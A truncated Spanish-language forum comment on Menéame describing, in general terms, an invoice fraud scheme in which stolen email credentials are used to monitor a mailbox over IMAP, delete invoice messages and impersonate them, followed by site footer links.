Otro problema y es lo que más he visto es robar las credenciales de acceso de alguien que recibe facturas para pagar. Monitorizar sus mensajes en el buzón entrando por imap y borrar mensajes de facturas recibidas. Suplantar esos mismos mensajes… » ver todo el comentario

0 6

«12 »

menéame

condiciones legales / de uso / y de cookies
/ quiénes somos
/ licencias: código, gráficos, contenido
/ HTML5
/ codigo fuente